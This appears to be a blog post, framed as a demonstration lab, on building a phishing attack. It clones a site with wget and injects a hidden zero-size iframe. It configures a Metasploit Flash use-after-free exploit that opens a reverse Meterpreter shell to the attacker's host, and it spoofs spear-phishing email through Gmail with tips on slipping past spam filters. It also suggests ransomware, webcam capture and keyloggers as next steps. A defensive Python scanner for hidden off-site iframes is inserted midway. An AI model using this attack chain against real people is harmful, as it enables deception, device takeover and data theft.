This post walks through a crude example of cloning an existing site for use in a phishing campaign. It relies on rudimentary techniques because it is only meant as a proof-of-concept demonstration lab; it is not a tutorial for conducting professional phishing. For simplicity it is based on a Kali 2017.2 distribution, but any Linux will do just as well.
There are of course many choices to make in phishing, such as target audience, content, payloads and so on; as mentioned, this is merely meant to give a few pointers on how to go about creating a minimal example.
Cloning a site with Kali
The Apache web server and an abundance of other tools already come shipped with Kali, so use the nails already in your toolbox.
A simple choice for cloning a page is wget (dating back to 1996). It is simple and gets the job done! The -p option (--page-requisites) makes sure that required files such as stylesheets and .js files are downloaded as well.
wget -p www.example.com
After the cloning is complete (insert preferred sci-fi reference here), move the files into Apache's document root.
mv www.example.com/* /var/www/html/
Lastly, fire up the Apache web server itself.
service apache2 start
You can test that it is working by simply browsing to http://localhost from the Kali GUI (if you have one running).
Spicing it up a little
Now that your cloned site is sitting on your local box, you will want to tinker with it a little by creating a hook on a given port. This can be done with a zero-width, zero-height iframe in which you can load whatever content you desire (in this example we will hook it up to Metasploit). Just open an editor, edit the main start page,
and insert the 'iframe part' as shown here:
<!DOCTYPE html> <html> <head><iframe src="http://kali-IP_or_somename:8080/" width="0" height="0" scrolling="no"></iframe> <title> ...
The iframe in question is 'invisible' to the user, but gives you the possibility to load 'something extra' on the fly. You will want to use real DNS names throughout if you go outside your local sandbox.
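Seen from the other side, the injected hook is exactly the thing a defender looks for when reviewing a suspected clone or a proxy capture: an iframe that is hidden and loads from a host other than the page's own. The following is an added example, not code from the original post; the sample HTML and the host name are constructed to mirror the snippet above.

```python
"""Flag hidden iframes that point off-site in a captured HTML page.

Added example (not from the original post): the constructed sample below
mirrors the zero-width, zero-height hook, and the scan reports iframes that
are invisible AND load from a host other than the page's own.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a cloned front page with the injected hook plus two
# benign frames (a visible third-party widget and a hidden same-host frame).
SAMPLE_HTML = """<!DOCTYPE html><html><head>
<iframe src="http://kali-IP_or_somename:8080/" width="0" height="0" scrolling="no"></iframe>
<title>Example</title></head><body>
<iframe src="https://www.example.com/widget" width="300" height="200"></iframe>
<iframe src="/local/frame" style="display: none"></iframe>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag as a dict."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def is_hidden(attrs):
    """True for the zero-size and CSS-hiding tricks used to conceal a frame."""
    style = attrs.get("style", "").replace(" ", "").lower()
    zero = attrs.get("width", "").strip() == "0" or attrs.get("height", "").strip() == "0"
    return zero or "display:none" in style or "visibility:hidden" in style


def find_suspicious_iframes(html, page_host):
    """Return src values of hidden iframes whose host differs from page_host."""
    collector = IframeCollector()
    collector.feed(html)
    hits = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname or page_host  # relative src -> same host
        if is_hidden(attrs) and host != page_host.lower():
            hits.append(src)
    return hits
```

Run against the sample, only the zero-size frame pointing at the Kali box is reported; the visible widget and the hidden same-host frame are not.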
Adding a malicious payload
In this example I will go with a full takeover of the machine using a relatively well-known Metasploit exploit module, which uses a use-after-free in Adobe Flash.
Use msfconsole and the following parameters (or copy them to a .rc file):
use exploit/multi/browser/adobe_flash_hacking_team_uaf
set SRVHOST kali-IP_or_somename
set SRVPORT 8080
set URIPATH /
set payload windows/meterpreter/reverse_tcp
set LHOST kali-IP_or_somename
set LPORT 666
exploit
This basically sets up a malicious .swf Flash file at the root of port 8080 on your machine (which we referenced earlier in the iframe) and stages a Meterpreter payload and listener.
Finding a vulnerable target
The exploit used here is somewhat old, and since we are only using it for demonstration purposes we can 'cheat' a little. If you install Windows 8.1 from scratch (or anything with an older Flash version), it will be vulnerable to this particular exploit and can be used for further demonstration.
If you browse to your cloned site from that machine, you should get a Meterpreter shell (i.e. control over the machine) on your Kali installation and can then move on to whatever demonstration you had in mind (persistence? uploading a cryptolocker? taking a photo with the webcam? stealing data or planting a keylogger?).
The point is that this particular exploit may be old, but new ones come out all the time, and they are often a cornerstone of exploit kits and thus a very real threat to users.
Baiting the target
The easiest way is spear-phishing email. The security mechanisms in email are pretty weak, and if you only spoof a limited number of mails with custom content you are likely to stay under the radar. Be aware that if you spoof domains that have SPF records (properly) in place, your fraudulent mail may be caught by the recipient's anti-spam solution.
Spoofing using Gmail as a relay (again, most freely available SMTP services will do) can be achieved as simply as this:
$ cat mailbody.txt | sendemail -l email.log -f "email@example.com" -u "Email Subject 2" -t "firstname.lastname@example.org" -cc "email@example.com" -bcc "firstname.lastname@example.org" -s "smtp.gmail.com:587" -o tls=yes -xu "email@example.com" -xp "Email Password"
In mailbody.txt you can write a small HTML page with a reference to your phishing site and whatever content you have placed there.
Another wrench in the Kali toolbox is the SEToolkit (Social-Engineer Toolkit), which can do much of the same as above (and more). However, it makes it somewhat harder to grasp what is going on in the background, and it can be a little annoying to work with when you have to reproduce the same thing more than once.